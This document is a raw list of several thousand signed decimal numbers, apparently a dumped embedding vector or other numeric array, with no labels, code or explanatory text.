-0.03725571185350418, -0.0279889814555645, 0.02145979180932045, 0.01832892745733261, 0.006883181165903807, -0.011288417503237724, -0.014340616762638092, 0.006910713855177164, -0.012594254687428474, -0.009770183824002743, -0.02067314274609089, -0.015441925264894962, -0.01955610141158104, -0.006214529275894165, 0.012830249965190887, 0.00822835136204958, -0.0016332805389538407, -0.004900825209915638, -0.0024209131952375174, 0.012169464491307735, 0.012963980436325073, -0.05528571084141731, -0.0014307183446362615, -0.0011180252768099308, -0.0016008312813937664, -0.009431924670934677, -0.01172107458114624, 0.016629766672849655, 0.0021790184546262026, -0.046192046254873276, 0.0037267510779201984, -0.025959426537156105, -0.0006878264830447733, -0.0009720035013742745, 0.011666009202599525, -0.0001918686757562682, -0.011508679017424583, -0.0016794962575659156, -0.0013019045582041144, -0.060225870460271835, 0.02803618088364601, 0.015166598372161388, 0.021664321422576904, 0.013168509118258953, 0.01026577316224575, -0.010627632029354572, -0.006859581917524338, -0.007307971827685833, -0.03530481830239296, -0.009707252494990826, -0.01113895419985056, -0.008558744564652443, 0.015355394221842289, -0.0019469569670036435, 0.006525255739688873, 0.0026687076315283775, 0.011799739673733711, -0.013160642236471176, -0.0008382731466554105, 0.0055576772429049015, -0.011288417503237724, -0.023394949734210968, 0.01702309027314186, 0.011555877514183521, -0.0012045566691085696, 0.013349438086152077, 0.026510080322623253, -0.015583522617816925, -0.006501656491309404, -0.001165224239230156, 0.010981624014675617, 0.013931558467447758, -0.012940380722284317, -0.008999267593026161, 0.002017755527049303, 0.027218064293265343, -0.02422879822552204, 0.018800918012857437, 0.012421192601323128, 0.00800808984786272, -0.013711296953260899, -0.026478614658117294, 0.01570938527584076, 0.02657301351428032, -0.02477945201098919, 0.005679607857018709, 0.009494856931269169, -0.0063325269147753716, 0.022891493514180183, 0.039395395666360855, -0.010942291468381882, 0.009243128821253777, -0.02706073597073555, -0.015378993935883045, 0.014938469976186752, -0.017888404428958893, -0.04071696847677231, 0.020468614995479584, -0.023866938427090645, 0.0060021341778337955, 0.018895315006375313, -0.0038958806544542313, -0.0005953951622359455, -0.047796811908483505, 0.033165134489536285, 0.004877225495874882, 0.015764452517032623, 0.010454569011926651, 0.00800808984786272, 0.004220373462885618, 0.007201774045825005, 0.02153845690190792, -0.01966623216867447, 0.0031288976315408945, 0.036783721297979355, -0.034769900143146515, 0.012783050537109375, 0.0009665953111834824, 0.01791987009346485, -0.03511602431535721, -0.03672078996896744, -0.014930603094398975, -0.02078327350318432, -0.02197898179292679, 0.014962069690227509, -0.01597684621810913, -0.024700786918401718, -0.029027357697486877, 0.016362305730581284, 0.00009513539407635108, -0.007984490133821964, 0.018297461792826653, -0.056827545166015625, 0.028303641825914383, -0.005329548846930265, -0.025880761444568634, 0.024952515959739685, 0.00488115893676877, -0.002800471382215619, -0.00714670866727829, 0.031072646379470825, 0.005577343516051769, 0.032111022621393204, -0.026148222386837006, 0.01821879670023918, -0.0074613685719668865, -0.005734673235565424, 0.019650498405098915, -0.014435014687478542, 0.017967069521546364, 0.009715118445456028, -0.007728829048573971, -0.006623587105423212, -0.033196598291397095, 0.005561610218137503, 0.008590210229158401, 0.009825249202549458, -0.0048260935582220554, -0.00955778919160366, 0.042793720960617065, -0.004999156109988689, -0.01069056335836649, 0.013506768271327019, 0.017086021602153778, 0.0039548794738948345, -0.007728829048573971, 0.0005565543542616069, 0.0027414727956056595, 0.001382536138407886, 0.04612911492586136, -0.020688876509666443, 0.03971005603671074, 0.000020372986909933388, 0.0016578633803874254, 0.016708429902791977, -0.0012674886966124177, 0.008543010801076889, 0.01058043260127306, 0.0076422980055212975, 0.01575658470392227, -0.000624402891844511, 0.01349103543907404, -0.017369216307997704, 0.032787542790174484, -0.028350839391350746, 0.04052817076444626, -0.003734617494046688, -0.006092598661780357, -0.023017358034849167, 0.029530813917517662, -0.0287441648542881, -0.002536943880841136, -0.0455312617123127, -0.02273416519165039, 0.014222619123756886, -0.043800633400678635, -0.02743832767009735, -0.02717086672782898, -0.003868347965180874, 0.0278001856058836, -0.0018063434399664402, 0.011217618361115456, 0.01142214797437191, 0.037413038313388824, -0.013357304967939854, -0.006776983384042978, 0.0010088777635246515, -0.0074849678203463554, 0.014962069690227509, -0.012531323358416557, 0.04465021193027496, 0.01244479138404131, -0.04364330321550369, -0.018690787255764008, 0.007284372579306364, -0.02844523824751377, 0.011044556275010109, -0.041409216821193695, 0.0007089676801115274, -0.011178286746144295, -0.013325839303433895, -0.047419220209121704, -0.011469346471130848, -0.031639035791158676, -0.041786808520555496, -0.017982803285121918, -0.02702927030622959, -0.0022832495160400867, -0.008849804289638996, 0.012775184586644173, 0.01851772330701351, -0.00508568761870265, -0.0021829516626894474, -0.013640498742461205, 0.047796811908483505, -0.008889136835932732, 0.017589477822184563, 0.02045288123190403, -0.0203427504748106, 0.00958925485610962, -0.01037590391933918, 0.009935380890965462, -0.03127717599272728, -0.002289149444550276, -0.005380681250244379, 0.00038644144660793245, -0.013042645528912544, -0.052044715732336044, -0.023505080491304398, -0.02803618088364601, -0.0024681121576577425, 0.004727762192487717, 0.019351571798324585, 0.00013594282791018486, -0.00936899334192276, -0.004472101107239723, 0.033794451504945755, -0.007422036025673151, 0.0369410514831543, -0.009424058720469475, 0.0056953406892716885, -0.016378037631511688, 0.004420969169586897, 0.004283305257558823, -0.04487047344446182, -0.01832892745733261, -0.03442377224564552, -0.00015671529399696738, -0.0021436193492263556, 0.058841366320848465, -0.04156654700636864, 0.017259085550904274, 0.011988535523414612, 0.03829408809542656, 0.010139909572899342, -0.03646906092762947, -0.012366126291453838, 0.01876945234835148, -0.0012930547818541527, 0.0002940101840067655, 0.02194751426577568, -0.012720119208097458, -0.012735852040350437, -0.0027355728670954704, -0.01056469976902008, -0.00637185899540782, -0.024511991068720818, 0.021412594243884087, -0.00586840370669961, -0.04109456017613411, 0.042416129261255264, -0.0065724547021090984, 0.009408325888216496, -0.030285997316241264, -0.023426415398716927, 0.02702927030622959, -0.0027572056278586388, -0.009840982966125011, -0.028083380311727524, -0.011650275439023972, -0.01533966138958931, -0.021003535017371178, -0.02567623183131218, 0.0037110180128365755, -0.02885429561138153, 0.019760629162192345, -0.03344832733273506, -0.02624261938035488, 0.008425014093518257, 0.006006067153066397, 0.0010413270210847259, 0.023756807669997215, -0.010698430240154266, -0.014828339219093323, -0.007776028010994196, 0.015253129415214062, -0.025849295780062675, 0.024433325976133347, -0.016079111024737358, -0.01407315582036972, 0.03119851090013981, -0.032944872975349426, -0.023316284641623497, 0.022199243307113647, -0.011508679017424583, 0.02934201806783676, 0.016409503296017647, 0.0013078044867143035, -0.016771363094449043, -0.019005445763468742, -0.012971846386790276, -0.023190420120954514, 0.029688144102692604, 0.014332749880850315, 0.014033823274075985, -0.03690958395600319, 0.0197763629257679, 0.007736695930361748, -0.011791872791945934, -0.0014572677901014686, 0.004299038555473089, 0.003811315866187215, 0.017982803285121918, -0.036563459783792496, 0.02105073444545269, 0.004346237517893314, -0.005754339508712292, -0.008802605792880058, 0.006135864183306694, -0.025015447288751602, -0.01732201687991619, -0.0014444846892729402, 0.0033766920678317547, 0.01069056335836649, 0.031292907893657684, 0.04093722999095917, 0.012814517132937908, -0.011107487604022026, -0.004090576432645321, 0.011382815428078175, 0.001377619570121169, 0.0019528568955138326, 0.00017306284280493855, -0.023489346727728844, -0.03722424432635307, -0.0027886717580258846, 0.0164252370595932, 0.011304150335490704, 0.013986623845994473, 0.04691576212644577, 0.02355227991938591, 0.01302691176533699, -0.023725342005491257, -0.0050345552153885365, 0.003414057893678546, 0.018501991406083107, -0.01123335212469101, 0.01244479138404131, 0.0038093491457402706, 0.03198515996336937, -0.00035915456828661263, -0.009534189477562904, 0.024921048432588577, 0.017636677250266075, 0.012090799398720264, -0.029609479010105133, 0.023206153884530067, -0.0380738265812397, -0.015205930918455124, 0.007410236168652773, 0.01773107424378395, 0.008881269954144955, -0.04867785796523094, 0.00507782120257616, -0.001133758225478232, -0.004157441668212414, 0.020059557631611824, 0.001413018791936338, -0.022608300670981407, -0.007803560700267553, 0.018533457070589066, 0.007378770504146814, 0.045625656843185425, -0.007850759662687778, 0.01795133575797081, -0.006627520080655813, -0.00918019749224186, -0.011123220436275005, 0.016787094995379448, 0.003744450630620122, -0.0065842545591294765, -0.03483283147215843, 0.010163508355617523, -0.00892060250043869, -0.020704608410596848, -0.01917850971221924, -0.013310105539858341, 0.01153227873146534, -0.024307463318109512, 0.010383770801126957, 0.00947912409901619, 0.012326794676482677, -0.006163397338241339, -0.02978254109621048, 0.030663589015603065, -0.020216885954141617, 0.033762987703084946, -0.017117489129304886, 0.00431870436295867, -0.0023992802016437054, -0.0037129847332835197, -0.022561101242899895, 0.0008377814665436745, 0.025330107659101486, -0.037601836025714874, -0.00032154290238395333, 0.0022655499633401632, -0.002662807935848832, -0.00044396519660949707, -0.015072200447320938, -0.016142044216394424, -0.017148954793810844, -0.003537955228239298, 0.02433892898261547, -0.03461256995797157, -0.002114119939506054, 0.030695054680109024, 0.07438555359840393, 0.012436925433576107, 0.007960890419781208, 0.008503679186105728, -0.017495080828666687, -0.0017040789825841784, -0.016110576689243317, 0.014789006672799587, 0.018973980098962784, 0.009243128821253777, 0.015001402236521244, -0.015819517895579338, 0.0013540200889110565, 0.024354660883545876, 0.020216885954141617, 0.012051466852426529, 0.020846206694841385, 0.002352081472054124, 0.016409503296017647, 0.0004579773813020438, 0.008763273246586323, 0.02404000237584114, 0.013609032146632671, -0.02429172955453396, 0.009282461367547512, -0.009266728535294533, -0.010320838540792465, 0.003915546927601099, -0.0033393262419849634, 0.004306904971599579, -0.0350845567882061, -0.005754339508712292, -0.013176375068724155, -0.0008259817259386182, -0.002151485765352845, -0.0033648922108113766, 0.026557279750704765, -0.019398771226406097, 0.00800415687263012, -0.019493170082569122, 0.002383547369390726, -0.02724953182041645, 0.010069110430777073, -0.00595493521541357, -0.03231555223464966, -0.0142776845023036, 0.016771363094449043, 0.0007659997208975255, 0.000448635924840346, -0.0048260935582220554, -0.006147664040327072, -0.020169688388705254, 0.031104112043976784, 0.030993981286883354, -0.0158588495105505, 0.0039784787222743034, -0.007134908810257912, 0.007736695930361748, -0.0019744897726923227, -0.025062646716833115, 0.021522725000977516, 0.0009960946626961231, 0.022073378786444664, 0.005361014977097511, 0.0007227340247482061, -0.009919647127389908, -0.0140888886526227, 0.006222395692020655, 0.004806427285075188, 0.006690452340990305, -0.005250883754342794, 0.002228184137493372, 0.002383547369390726, -0.004295105114579201, -0.0007940241484902799, 0.024386128410696983, -0.024055734276771545, 0.007807494141161442, -0.014435014687478542, 0.0000914479824132286, 0.021286729723215103, 0.0395527258515358, -0.019162775948643684, -0.01903691329061985, -0.004078776575624943, 0.02515704371035099, -0.015929648652672768, 0.0162364412099123, 0.005427880212664604, -0.017715342342853546, -0.0013087877305224538, -0.0006204696255736053, 0.011500812135636806, 0.007693429943174124, -0.008676741272211075, -0.00022714497754350305, 0.01440354809165001, 0.006273528095334768, 0.004723828751593828, -0.0028870028909295797, 0.027202332392334938, -0.004617631435394287, 0.025990892201662064, 0.003496655961498618, -0.015882449224591255, 0.01634657196700573, 0.004035511054098606, 0.021192330867052078, 0.0027414727956056595, 0.010053377598524094, 0.01683429442346096, 0.0007502667722292244, 0.00958925485610962, -0.03634319826960564, -0.024763720110058784, -0.02075180783867836, 0.020547280088067055, 0.005785805638879538, 0.018722252920269966, -0.021774452179670334, -0.02646288275718689, -0.01037590391933918, -0.0029833673033863306, 0.004723828751593828, 0.02227790839970112, 0.01936730556190014, -0.001821093144826591, -0.02466932125389576, -0.0006942179752513766, 0.016409503296017647, 0.013852894306182861, -0.01746361330151558, 0.01862785592675209, -0.01369556412100792, 0.0350845567882061, -0.02556610107421875, -0.009156597778201103, 0.009644320234656334, 0.014136088080704212, -0.002940101781859994, 0.004031577613204718, 0.028618300333619118, 0.012806650251150131, 0.013231441378593445, 0.013089844025671482, -0.0007109342841431499, -0.004287238698452711, 0.01854919083416462, 0.024197332561016083, -0.0013235374353826046, 0.00804348848760128, 0.006131931208074093, 0.020138220861554146, 0.04971623420715332, 0.00020612670050468296, -0.004582231864333153, 0.009070065803825855, -0.02964094467461109, -0.00693431356921792, 0.011823338456451893, -0.006619653664529324, 0.014977802522480488, 0.024401860311627388, 0.004373770207166672, 0.008653142489492893, 0.017794007435441017, -0.008464346639811993, -0.02314322255551815, -0.04090576246380806, -0.03952125832438469, -0.010855760425329208, 0.0313558392226696, -0.01806146837770939, -0.006281394511461258, 0.00927459541708231, -0.006422991398721933, -0.011839071288704872, -0.031151311472058296, -0.0006853681989014149, 0.0015605154912918806, -0.005368881393224001, 0.006143731065094471, -0.02172725275158882, -0.028870029374957085, 0.052390843629837036, -0.03521042317152023, 0.018832383677363396, 0.018234530463814735, -0.043391574174165726, -0.008039555512368679, 0.0021475525572896004, 0.012185197323560715, -0.021522725000977516, -0.011304150335490704, -0.02477945201098919, 0.015127265825867653, -0.0017807773547247052, 0.014804739505052567, 0.022907227277755737, -0.022891493514180183, -0.0006430858047679067, -0.0030718655325472355, -0.008613809943199158, -0.0075636329129338264, 0.0139000928029418, 0.008456479758024216, 0.014922737143933773, 0.011524411849677563, 0.003516322234645486, -0.006242061965167522, -0.010242173448204994, 0.02097206935286522, 0.014466480351984501, 0.04332864284515381, 0.007968757301568985, 0.007162441499531269, 0.0388290099799633, -0.018895315006375313, 0.00871607381850481, 0.014812606386840343, -0.013624765910208225, 0.01574871875345707, 0.00022112220176495612, 0.004613697994500399, -0.01917850971221924, 0.02322188764810562, 0.030632123351097107, -0.006210596300661564, -0.01911557838320732, 0.0358397401869297, -0.013207841664552689, 0.003394391620531678, 0.0103601710870862, 0.0055930763483047485, 0.0030010670889168978, -0.03313366696238518, 0.00039799537626095116, 0.005246950779110193, 0.026101022958755493, -0.04616057872772217, 0.007370903622359037, 0.015347527340054512, -0.04213293641805649, -0.004940157290548086, -0.011060289107263088, -0.0003040891024284065, 0.017778273671865463, 0.006183063145726919, -0.022561101242899895, 0.024134399369359016, -0.012971846386790276, 0.013270772993564606, -0.0008048405288718641, 0.012712252326309681, -0.005797605030238628, 0.031371574848890305, 0.003410124685615301, -0.03524188697338104, 0.004727762192487717, -0.020028090104460716, 0.01694442518055439, -0.0015054501127451658, -0.00785469263792038, -0.004365903325378895, -0.0035989205352962017, 0.023977071046829224, -0.030521992594003677, 0.01675562933087349, -0.00957352202385664, 0.010832160711288452, -0.023866938427090645, -0.011548011563718319, -0.00938472617417574, -0.008448612876236439, 0.0006032616947777569, -0.008700340986251831, 0.0026746075600385666, -0.015158731490373611, 0.011752540245652199, 0.006080798804759979, 0.0027513059321790934, 0.020657410845160484, 0.022608300670981407, -0.0069815125316381454, -0.013797827996313572, 0.018155865371227264, -0.008094620890915394, -0.0103601710870862, -0.0053059495985507965, -0.025440238416194916, 0.01765240915119648, -0.009148730896413326, -0.0201539546251297, -0.013955158181488514, -0.009235262870788574, 0.03307073563337326, -0.01702309027314186, 0.02986120618879795, -0.0006848765187896788, -0.0050463550724089146, 0.01388435997068882, 0.024165866896510124, 0.009542055428028107, -0.006973646115511656, 0.002497611567378044, -0.001047226833179593, -0.014340616762638092, -0.00035153390490449965, 0.014615943655371666, -0.010383770801126957, 0.04534246399998665, -0.02806764654815197, -0.015953248366713524, -0.011028822511434555, 0.0004279863787814975, -0.00440523587167263, -0.0037739500403404236, 0.0123189277946949, 0.010328705422580242, -0.013601166196167469, 0.01047030184417963, -0.0025231775362044573, 0.00507782120257616, -0.026179688051342964, -0.014789006672799587, -0.003923413343727589, 0.0019164743134751916, 0.012452658265829086, -0.015268862247467041, 0.009502722881734371, 0.016802828758955002, 0.017086021602153778, 0.0019213908817619085, 0.029436416923999786, 0.021742986515164375, -0.008063155226409435, -0.0025644765701144934, 0.025959426537156105, -0.011996401473879814, -0.00519581837579608, -0.03105691447854042, 0.025613300502300262, -0.024511991068720818, 0.0019400737946853042, 0.012098666280508041, -0.010556833818554878, -0.017400681972503662, 0.013042645528912544, -0.0021180531475692987, 0.006647186353802681, -0.013970891013741493, -0.005903802812099457, -0.022372305393218994, -0.00400404492393136, 0.012790917418897152, 0.025172777473926544, 0.006419057957828045, 0.00031957626924850047, -0.014859804883599281, -0.02937348373234272, -0.010368037968873978, -0.01263358723372221, 0.009581387974321842, -0.007201774045825005, 0.0023501147516071796, 0.005207618232816458, -0.003152497112751007, -0.0038703144527971745, -0.020091023296117783, -0.013632631860673428, -0.014324882999062538, -0.008401414379477501, -0.022120578214526176, 0.0055930763483047485, 0.010493901558220387, 0.010084844194352627, 0.018486257642507553, 0.01873798668384552, -0.024307463318109512, 0.011249084956943989, 0.007858626544475555, -0.009919647127389908, 0.024574924260377884, 0.012948247604072094, -0.025817830115556717, -0.003532055299729109, -0.009864581748843193, 0.008448612876236439, -0.006387592293322086, 0.021113667637109756, -0.003974545281380415, -0.0039489795453846455, -0.011194019578397274, 0.03722424432635307, -0.016299372538924217, 0.003585154190659523, 0.018785184249281883, 0.009298194199800491, -0.028429504483938217, 0.01015564240515232, 0.016960158944129944, 0.007583299186080694, -0.01754227839410305, 0.012688652612268925, -0.005317748989909887, 0.01843906007707119, -0.0019115577451884747, -0.013467435725033283, 0.030333196744322777, 0.005455412901937962, 0.02986120618879795, 0.02518850937485695, 0.018612122163176537, 0.009282461367547512, 0.016787094995379448, -0.009998312219977379, -0.011548011563718319, -0.02844523824751377, -0.019508901983499527, 0.0006293194019235671, 0.015599255450069904, 0.028429504483938217, 0.005691407714039087, -0.01517446432262659, 0.021506991237401962, 0.0027414727956056595, 0.005427880212664604, -0.039584193378686905, -0.00431083794683218, 0.025880761444568634, -0.008661008439958096, 0.007858626544475555, -0.003516322234645486, 0.018391860648989677, -0.015536323189735413, 0.010855760425329208, 0.0011691574472934008, 0.006529189180582762, -0.017416415736079216, -0.0015133165288716555, 0.02156992256641388, 0.004322637803852558, -0.03634319826960564, -0.00781929399818182, 0.0062538618221879005, -0.009628587402403355, -0.003172163153067231, 0.011689607985317707, 0.013302239589393139, 0.00022013888519722968, 0.028932960703969002, 0.0004048785485792905, 0.018265996128320694, 0.006045399699360132, -0.01048603467643261, 0.002558576874434948, 0.02706073597073555, 0.006257795263081789, 0.0010383770568296313, 0.01634657196700573, 0.02586502768099308, -0.00469236308708787, 0.01821879670023918, -0.001768977614119649, -0.000908088288269937, 0.017636677250266075, -0.005136820022016764, -0.014812606386840343, -0.015945380553603172, -0.032378483563661575, 0.019902227446436882, -0.00440523587167263, -0.002867336617782712, -0.0201539546251297, -0.008055288344621658, -0.01947743631899357, 0.0022321173455566168, -0.01086362637579441, 0.010651231743395329, -0.0027768719010055065, 0.013616899028420448, 0.029011625796556473, 0.0005432796897366643, -0.008991401642560959, 0.01172107458114624, 0.021963248029351234, 0.006977579090744257, 0.008936336264014244, -0.008259817026555538, 0.011791872791945934, -0.012137998826801777, 0.015087933279573917, -0.008834071457386017, 0.02067314274609089, 0.007736695930361748, -0.015150865539908409, -0.00703657791018486, 0.008771139197051525, -0.008613809943199158, 0.003992245066910982, -0.00347502320073545, 0.01713322103023529, -0.0006514439592137933, -0.02899589203298092, 0.008401414379477501, -0.03116704523563385, 0.011414281092584133, -0.02567623183131218, 0.011296283453702927, -0.015559922903776169, 0.01765240915119648, -0.007728829048573971, -0.0030521992594003677, 0.009534189477562904, 0.00804348848760128, 0.0018653421429917216, 0.008425014093518257, 0.008747540414333344, -0.011540144681930542, -0.019084110856056213, 0.011005223728716373, 0.01470247469842434, 0.00734337093308568, -0.010226440615952015, -0.015882449224591255, -0.012798784300684929, -0.007894025184214115, 0.02037421613931656, -0.017668142914772034, -0.013074111193418503, 0.017526546493172646, -0.005608809180557728, -0.011382815428078175, -0.06006854027509689, 0.0074849678203463554, 0.009077932685613632, 0.02877563051879406, -0.002043321495875716, 0.008157553151249886, -0.02459065616130829, 0.014151820912957191, -0.006084732245653868, -0.00020747874805238098, -0.0044642346911132336, -0.003449456999078393, -0.015284596011042595, 0.007048377767205238, -0.017086021602153778, -0.008983534760773182, 0.003689385252073407, -0.004633364267647266, -0.009927514009177685, -0.013805694878101349, -0.002375680720433593, -0.004263638984411955, 0.012248129583895206, -0.009408325888216496, 0.0034927227534353733, -0.005073887761682272, -0.0007104426622390747, -0.02045288123190403, -0.007359104230999947, -0.004145641811192036, 0.006108331494033337, -0.0035045226104557514, -0.008141820318996906, 0.004660896956920624, 0.012051466852426529, -0.008149686269462109, -0.006957912817597389, 0.00059834512649104, -0.02202617935836315, -0.011618809774518013, -0.0009120214963331819, -0.007536100223660469, -0.01056469976902008, -0.01664549857378006, -0.015111532993614674, 0.022230708971619606, -0.000526071700733155, 0.03933246433734894, 0.009227395989000797, 0.0030816986691206694, 0.0007310921791940928, 0.0039194799028337, -0.012271728366613388, -0.0035694211255759, 0.004948024172335863, -0.01037590391933918, -0.00871607381850481, -0.0016962125664576888, -0.003130864119157195, -0.0038958806544542313, 0.007457435131072998, -0.016488168388605118, -0.02466932125389576, -0.01672416366636753, 0.010446702130138874, -0.0036028537433594465, 0.017715342342853546, 0.005939201917499304, 0.024024268612265587, -0.002816204447299242, -0.017699608579277992, -0.02526717446744442, 0.01608697697520256, 0.025172777473926544, 0.00724110659211874, -0.019162775948643684, -0.019398771226406097, -0.0009105465724132955, -0.011296283453702927, 0.00683991564437747, 0.006820249371230602, 0.003962745890021324, 0.007831093855202198, 0.029735343530774117, 0.004495700821280479, -0.0037562502548098564, -0.03521042317152023, 0.011681742034852505, -0.0010954091558232903, 0.01814013160765171, 0.035588014870882034, -0.012578521855175495, 0.0018889416242018342, 0.012358260340988636, 0.003968645818531513, 0.005109286867082119, -0.003067932091653347, -0.006513455882668495, 0.013184241950511932, 0.029766809195280075, 0.004409169312566519, 0.005144686438143253, 0.030443327501416206, 0.017180420458316803, -0.01123335212469101, -0.025896495208144188, -0.00810248777270317, 0.00002204769043601118, -0.009754450991749763, 0.011256950907409191, -0.0016981791704893112, -0.01065909769386053, 0.010737762786448002, 0.007815361022949219, -0.004841826390475035, 0.013483168557286263, -0.015135131776332855, 0.0024936781264841557, 0.0008363065426237881, 0.0009105465724132955, 0.011398548260331154, -0.0012802716810256243, 0.0008815388428047299, -0.017495080828666687, -0.004338370636105537, 0.015811650082468987, 0.04408382624387741, -0.004247906152158976, -0.009376859292387962, 0.026399949565529823, 0.012067199684679508, 0.0063915252685546875, 0.013719163835048676, -0.004358036909252405, 0.008889136835932732, 0.017904138192534447, 0.024087201803922653, -0.004928357899188995, 0.023725342005491257, 0.002647074870765209, 0.028350839391350746, 0.006655052769929171, 0.010132042691111565, -0.02358374558389187, -0.01963476650416851, 0.012845982797443867, 0.014600210823118687, -0.007842893712222576, -0.020893404260277748, 0.010462435893714428, -0.004747428465634584, 0.00901500042527914, -0.012657186947762966, -0.019084110856056213, -0.01282238308340311, 0.009132998064160347, -0.005687474273145199, 0.009164463728666306, -0.013727029785513878, 0.004920491483062506, -0.0099825793877244, 0.004806427285075188, -0.027910316362977028, 0.009581387974321842, 0.013758496381342411, 0.01123335212469101, 0.00556947709992528, 0.0034474905114620924, 0.004035511054098606, -0.009494856931269169, 0.014419280923902988, -0.006301060784608126, 0.02377254143357277, 0.000892355281393975, 0.010926558636128902, -0.008196885697543621, -0.007583299186080694, 0.007284372579306364, -0.009746585041284561, 0.025141311809420586, -0.015394726768136024, 0.033165134489536285, -0.009911781176924706, -0.03307073563337326, -0.002440579468384385, 0.015489124692976475, 0.012342527508735657, -0.00881047174334526, 0.004169241059571505, -0.010832160711288452, -0.02556610107421875, -0.0099825793877244, -0.01067483052611351, -0.002253750106319785, -0.015213796868920326, -0.004743495024740696, 0.011241218075156212, 0.013821427710354328, 0.00006489856605185196, 0.03521042317152023, 0.0160476453602314, -0.00002676451185834594, -0.0028889693785458803, 0.012208797037601471, -0.02825644239783287, 0.0024563123006373644, 0.002578242914751172, 0.01282238308340311, 0.02404000237584114, 0.0030561324674636126, -0.0018024101154878736, 0.005836937576532364, -0.002713940106332302, -0.007941224612295628, -0.01086362637579441, -0.011028822511434555, -0.00040561603964306414, 0.003941113129258156, 0.007256839424371719, 0.00597066804766655, 0.009628587402403355, 0.0050109559670090675, 0.014356349594891071, 0.01078496128320694, 0.012216662988066673, 0.005250883754342794, 0.010997356846928596, -0.0030010670889168978, 0.013302239589393139, -0.005109286867082119, 0.007056244183331728, 0.009675785899162292, 0.008590210229158401, 0.013105576857924461, -0.024024268612265587, -0.02396133728325367, 0.006588187534362078, 0.017117489129304886, 0.015213796868920326, 0.0199651587754488, -0.01161094382405281, 0.023977071046829224, 0.011013089679181576, 0.033385396003723145, -0.002051187912002206, 0.004790693987160921, -0.0007409253157675266, 0.01675562933087349, -0.022702697664499283, 0.002749339211732149, -0.0032665610779076815, 0.010604032315313816, -0.0008131986833177507, 0.02083047293126583, 0.011209752410650253, 0.019209975376725197, -0.029200421646237373, 0.0016077144537121058, -0.0061397976242005825, -0.014427147805690765, -0.016393771395087242, -0.00010675076919142157, 0.006977579090744257, 0.00596280163154006, 0.006843848619610071, -0.019697697833180428, -0.006403325125575066, -0.010698430240154266, 0.0021396861411631107, 0.0034356906544417143, -0.002263583242893219, 0.03580827638506889, -0.002588076051324606, -0.026919137686491013, 0.018407592549920082, 0.0019164743134751916, 0.002314715413376689, -0.005109286867082119, 0.003063998883590102, -0.013310105539858341, -0.0201539546251297, 0.008299149572849274, -0.004440634977072477, -0.03873461112380028, 0.01667696423828602, -0.0018958247965201735, -0.0021396861411631107, 0.0074259694665670395, 0.006281394511461258, 0.011060289107263088, -0.003077765228226781, 0.0014258017763495445, -0.003878180868923664, 0.003115131054073572, -0.01735348254442215, 0.0037995160091668367, 0.00873180665075779, -0.025031181052327156, 0.009699385613203049, -0.005927402526140213, -0.0012606055242940784, -0.006120131351053715, -0.0033806252758949995, -0.0051800855435431, -0.00996684655547142, 0.022293640300631523, 0.010320838540792465, -0.008236218243837357, -0.022199243307113647, 0.014820472337305546, 0.008904869668185711, -0.0023383148945868015, 0.006997245363891125, 0.013373037800192833, 0.001299937954172492, 0.004967690445482731, 0.009754450991749763, 0.013892225921154022, 0.014002357609570026, 0.006812382955104113, 0.010635497979819775, 0.009101532399654388, 0.006741584278643131, -0.00012377434177324176, -0.008912736549973488, 0.0003911122039426118, -0.005435746628791094, 0.03351125866174698, 0.004951957147568464, 0.02001235820353031, 0.0034730564802885056, -0.013058378361165524, -0.003156430320814252, 0.0032350951805710793, -0.006725851446390152, -0.04905544966459274, -0.010745629668235779, -0.014914870262145996, -0.0009828199399635196, 0.002965667750686407, 0.002987300744280219, 0.007449568714946508, 0.003805415937677026, 0.001645080279558897, 0.0010609931778162718, -0.030396128073334694, 0.00683991564437747, 0.00871607381850481, -0.0008240151219069958, -0.00034317575045861304, 0.010651231743395329, -0.007606898434460163, 0.0013363204197958112, -0.0069382465444505215, 0.0019164743134751916, -0.0015959147131070495, -0.008535144850611687, -0.017605211585760117, 0.028712699189782143, -0.0034435573033988476, 0.021742986515164375, 0.0022616167552769184, 0.02732819691300392, -0.008723940700292587, -0.008834071457386017, 0.006666852626949549, 0.00957352202385664, 0.015205930918455124, -0.013546100817620754, -0.0069146472960710526, 0.004389503039419651, 0.01702309027314186, -0.013711296953260899, 0.010069110430777073, -0.005105353891849518, 0.014993535354733467, 0.01892678253352642, 0.011256950907409191, -0.008299149572849274, 0.0058094048872590065, -0.006206662859767675, 0.020704608410596848, 0.0009444708121009171, -0.009101532399654388, -0.00018461675790604204, -0.011367082595825195, 0.004944090731441975, 0.02056301198899746, 0.004833959974348545, 0.012759451754391193, 0.0043147713877260685, -0.007012978196144104, -0.015198064036667347, 0.013310105539858341, -0.0018191264243796468, 0.0027218065224587917, -0.00892060250043869, -0.005062088370323181, 0.018234530463814735, 0.01153227873146534, 0.006753384135663509, -0.02232510596513748, 0.007870426401495934, -0.0012704385444521904, -0.008472212590277195, -0.014631676487624645, 0.02415013313293457, -0.0076344311237335205, 0.0012183231301605701, 0.0035458216443657875, -0.03930099681019783, -0.008456479758024216, 0.011886270716786385, 0.006485923193395138, -0.008189018815755844, 0.012594254687428474, -0.003026633057743311, 0.0006008034106343985, -0.024842385202646255, 0.007508567534387112, 0.0015103666810318828, -0.030584923923015594, -0.0005127969780005515, 0.018596388399600983, -0.011091754771769047, 0.02004382386803627, 0.012767317704856396, -0.006080798804759979, -0.013498901389539242, 0.014867671765387058, 0.0244490597397089, -0.0014612009981647134, -0.0065055894665420055, -0.0023796141613274813, -0.009195930324494839, 0.004251839593052864, 0.00013016587763559073, -0.012193064205348492, -0.002959767822176218, 0.015260996297001839, -0.0162364412099123, 0.009211663156747818, 0.019209975376725197, 0.001129825017414987, -0.016220707446336746, 0.014324882999062538, 0.009990446269512177, 0.006049333140254021, -0.02224644087255001, -0.0205315463244915, -0.011249084956943989, 0.01302691176533699, -0.012405458837747574, -0.016079111024737358, -0.021176598966121674, 0.001708012307062745, -0.0046805632300674915, 0.005750406067818403, -0.015394726768136024, 0.03075798787176609, 0.026195421814918518, 0.014962069690227509, -0.017856938764452934, 0.009542055428028107, 0.0045664990320801735, 0.017416415736079216, -0.022938692942261696, -0.006871381308883429, -0.0011367081897333264, -0.017825473099946976, -0.00400207843631506, 0.02769005484879017, -0.0053413487039506435, -0.01056469976902008, 0.0019685898441821337, 0.0030148334335535765, -0.013593299314379692, 0.02083047293126583, 0.016031911596655846, 0.000005980532023386331, -0.017778273671865463, 0.00430297153070569, 0.015732984989881516, -0.011406414210796356, 0.034801363945007324, 0.0010019944747909904, -0.019272906705737114, -0.03631173074245453, 0.019461702555418015, -0.0005068971076980233, -0.03606000170111656, -0.0332280658185482, -0.008330616168677807, -0.004456368274986744, -0.021790185943245888, 0.003929313272237778, 